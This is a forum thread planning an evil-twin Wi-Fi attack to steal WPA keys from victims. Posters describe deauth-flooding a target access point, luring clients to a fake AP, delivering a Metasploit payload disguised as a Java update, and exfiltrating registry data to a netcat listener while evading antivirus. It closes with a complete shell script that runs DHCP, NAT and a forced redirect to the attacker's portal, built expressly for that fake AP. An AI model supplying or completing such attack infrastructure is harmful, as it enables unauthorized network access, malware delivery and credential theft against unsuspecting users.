My initial idea was to just dump specific info, but like you said, it is a pain trying to find what you want.
Then I looked into Karmetasploit and thought, why don't we do this:
Create a fake AP using airbase-ng; the user is redirected to an exploit page, the exploits run in iframes, and we dump the whole registry.
Then we search the registry in our own time. We can be prepared next time by having the WPA keys and, as you said, all sorts of other vital information.
Now what we need is a single universal way of uploading a payload; my guess would be to create something on the redirected page.
Just been mucking around with D-Link and DSE wireless third-party utilities, and they are in the same area.
Just looked up how to read the reg in C, so I will try and write an exe that can be uploaded with Metasploit and executed. The program would read about 10 key folders, send them out a socket (connect using nc on BT to, say, port 6000) and display the strings etc. I think most AVs don't detect programs that use that function, just the order and stuff.
Is autopwn included with BT3?
Nvm, didn't realize it was part of Fast-Track.
I hate Google.
I've been thinking further about this.
If we did somehow manage to dump the WPA hash from the registry, we would still need to decrypt it. In Windows you can use Cain, but even so that takes a long time too.
So unless the user is prompted to give us the WPA key, I don't think it is going to work.
POC... Create fake AP, user connects to fake AP, Evilgrade, upload MSF payload, connect back to PC. This should work, but then what? We still have the problem of obtaining the WPA key.
Whether the WPA keys are stored in the registry encrypted or not, it will still need a key in the registry or in some other place to decode them for the wireless connection.
I'm guessing, but it would probably be something like the account ID and MD5.
A bit more progress:
We can use this tool: http://www.nirsoft.net/utils/wireless_key.html. Upload it and execute it via the command line; it can save all keys to a text file.
It gives all keys in hex.
Very well explained, dude. Cheers for that.
We would still need the final stage of getting an MSF payload onto our victim if it's a fully patched system.
Drive-by downloads are an option, but we need a way to bypass AVs with these.
I've been looking into Evilgrade, and one of our options may be to have a page that displays Java but then says it needs to be updated, and have an update link embedded within it. I know we can deliver the payload by directly forcing them to download an exe, but that would be too suspicious; instead we let them think it's a real upgrade.
I've also been looking into one-time redirection only: we don't want our victim to be constantly viewing the same page; we want them to type any address in, get redirected to the "portal" and then be able to surf happily.
Something similar to NoCatSplash. This seems interesting: http://www.cs.usfca.edu/~afedosov/netgreg/
Ok, this thread is exactly what I am trying to do myself. I just have a few problems that I need to solve.
What I have working: Evil AP. Aireplay is doing a massive DDoS to the victim's AP; all clients are not associated and are probing for the ESSID.
Ok, so the basics are done.
Now I need to get the DHCP server up and running to assign IP addresses to the clients.
I downloaded dhcp-3.0.7 from the ISC site, but I am having problems installing it. Not sure if it's compatible with BackTrack 3. Any ideas here? This is the error it is piping to me:

Code:
bt dhcp-3.0.7 # ./configure
System Type: linux-2.2
make[1]: Entering directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2'
make[1]: Warning: File `Makefile' has modification time 1.4e+04 s in the future
Making links in common
make[2]: Entering directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2/common'
make[2]: Warning: File `Makefile' has modification time 1.4e+04 s in the future
ln: creating symbolic link `raw.c': Operation not supported
ln: creating symbolic link `parse.c': Operation not supported
ln: creating symbolic link `nit.c': Operation not supported
THIS GOES ON FOR A PAGE
ln: creating symbolic link `dhcp-eval.5': Operation not supported
make[2]: *** [links] Error 1
make[2]: Leaving directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2/common'
make[1]: *** [links] Error 1
make[1]: Leaving directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2'
make: *** [links] Error 2

After this I just wanted to see if it would make, and this is that error:

Code:
bt dhcp-3.0.7 # make
make[1]: Entering directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2'
make[1]: Warning: File `Makefile' has modification time 1.4e+04 s in the future
Making all in common
make[2]: Entering directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2/common'
make[2]: Warning: File `Makefile' has modification time 1.4e+04 s in the future
make[2]: *** No rule to make target `raw.o', needed by `libdhcp.a'.  Stop.
make[2]: Leaving directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2/common'
make[1]: *** [all] Error 1
make[1]: Leaving directory `/tmp/cap/dhcp-3.0.7/work.linux-2.2'
make: *** [all] Error 2

So this is where I am stuck at. Any help would be greatly appreciated.
Also, I would like to add: I think this is one of the best ways of attacking WPA/WPA2 networks. Brute-forcing just does not work very well with all the possible keys you can have, unless you put the key in your dictionary file.
I would love to see an in-depth tutorial on this subject. That would be purely awesome.
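The two pieces the thread is missing, the DHCP server for the fake-AP clients and the "redirect once, then let them surf" portal behaviour asked about earlier, fit in one small script, given below as an added example; it is not code from anyone in the thread. It assumes airbase-ng is already running and has created the at0 tap interface, that eth0 carries the real uplink, that ISC dhcpd and iptables are installed, that a web server on 10.0.0.1 serves the portal page, and that the leases file lives at /var/state/dhcp/dhcpd.leases; the interface names, subnet, ports and paths are all assumptions to adjust. The redirect is done with a DNAT chain, so it does not matter what address the client typed; a client is exempted from the chain once the portal handler calls the release step, which looks the client's MAC up in dhcpd.leases so the exemption does not pass to whoever gets that IP next. On the build errors above: `ln: ... Operation not supported` is what you get when the build directory sits on a filesystem that cannot hold symlinks (a FAT-formatted stick, typically); building on a Linux filesystem avoids it.

```shell
#!/bin/sh
# Backend for an airbase-ng fake AP: DHCP for the clients on at0, NAT out via
# an upstream link, and a one-time HTTP redirect to a local "portal" page.
# Added example, not code from the thread. Assumptions: airbase-ng is already
# running and has created at0, eth0 has the real uplink, ISC dhcpd and
# iptables are installed, and a web server on 10.0.0.1 serves the portal.

AP_IF="${AP_IF:-at0}"                 # tap interface created by airbase-ng (assumed)
UP_IF="${UP_IF:-eth0}"                # interface with real internet access (assumed)
AP_NET="10.0.0.0"; AP_MASK="255.255.255.0"
AP_GW="10.0.0.1"                      # our address on at0; also the portal host
AP_DNS="${AP_DNS:-$AP_GW}"            # something must answer DNS here (e.g. dnsmasq)
AP_RANGE_LO="10.0.0.100"; AP_RANGE_HI="10.0.0.200"
PORTAL_PORT="${PORTAL_PORT:-80}"
DHCPD_CONF="/tmp/fakeap-dhcpd.conf"
LEASES="${LEASES:-/var/state/dhcp/dhcpd.leases}"  # assumed BackTrack 3 path

# Minimal dhcpd.conf for the fake-AP subnet. A function so the text can be
# inspected without root or a running dhcpd.
render_dhcpd_conf() {
    cat <<EOF
ddns-update-style none;
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet $AP_NET netmask $AP_MASK {
    range $AP_RANGE_LO $AP_RANGE_HI;
    option routers $AP_GW;
    option subnet-mask $AP_MASK;
    option domain-name-servers $AP_DNS;
}
EOF
}

# Look up the MAC for a client IP in dhcpd.leases. dhcpd appends, so the last
# lease block for that IP is the current one. Prints nothing if not found.
mac_for_ip() {
    awk -v ip="$2" '
        $1 == "lease" && $2 == ip                        { inlease = 1; next }
        inlease && $1 == "hardware" && $2 == "ethernet"  { mac = $3; sub(/;$/, "", mac) }
        inlease && $1 == "}"                             { inlease = 0 }
        END                                              { if (mac != "") print mac }
    ' "$1"
}

setup_ap_iface() {
    ifconfig "$AP_IF" up "$AP_GW" netmask "$AP_MASK"
}

start_dhcpd() {
    render_dhcpd_conf > "$DHCPD_CONF"
    mkdir -p "$(dirname "$LEASES")"
    touch "$LEASES"                   # dhcpd refuses to start without a leases file
    dhcpd -cf "$DHCPD_CONF" -lf "$LEASES" "$AP_IF"
}

# One-time redirect: HTTP arriving on at0 enters the PORTAL chain. Clients
# with a RETURN rule there go straight out through NAT; everyone else is
# DNATed to the portal, whatever destination they typed.
setup_nat_and_portal() {
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -N PORTAL 2>/dev/null || iptables -t nat -F PORTAL
    iptables -t nat -A PORTAL -p tcp --dport 80 -j DNAT --to-destination "$AP_GW:$PORTAL_PORT"
    iptables -t nat -A PREROUTING -i "$AP_IF" -p tcp --dport 80 -j PORTAL
    iptables -t nat -A POSTROUTING -o "$UP_IF" -j MASQUERADE
}

# Called by the portal page handler (which knows the client IP from
# REMOTE_ADDR) once the page has been served: exempt that IP+MAC pair.
# Matching the MAC too stops a later lease of the same IP inheriting the pass.
portal_release() {
    mac="$(mac_for_ip "$LEASES" "$1")"
    [ -n "$mac" ] || { echo "no lease for $1" >&2; return 1; }
    iptables -t nat -I PORTAL 1 -s "$1" -m mac --mac-source "$mac" -j RETURN
}

# Constructed sample leases (not real data) for trying mac_for_ip offline.
sample_leases() {
    cat <<'EOF'
lease 10.0.0.101 {
  binding state active;
  hardware ethernet 00:11:22:33:44:55;
}
lease 10.0.0.102 {
  binding state active;
  hardware ethernet 00:aa:bb:cc:dd:ee;
}
lease 10.0.0.101 {
  binding state active;
  hardware ethernet 00:de:ad:be:ef:01;
}
EOF
}

case "${1-}" in
    up)      setup_ap_iface; start_dhcpd; setup_nat_and_portal ;;
    release) portal_release "$2" ;;
    demo)    f="$(mktemp)"; sample_leases > "$f"; mac_for_ip "$f" 10.0.0.101; rm -f "$f" ;;
esac
```

Assuming it is saved as fakeap.sh: run `sh fakeap.sh up` as root after airbase-ng has brought up at0, and have the portal's CGI (or whatever serves the page) run `sh fakeap.sh release $REMOTE_ADDR` once the page is delivered, which needs root for iptables, so that call has to go through sudo or a setuid wrapper. `sh fakeap.sh demo` exercises only the lease parser against the constructed sample and needs no privileges. If DNS is pointed at the AP address, a resolver such as dnsmasq has to listen there, or set AP_DNS to an upstream resolver reachable through the NAT; without working DNS the browser never issues the HTTP request that the redirect relies on.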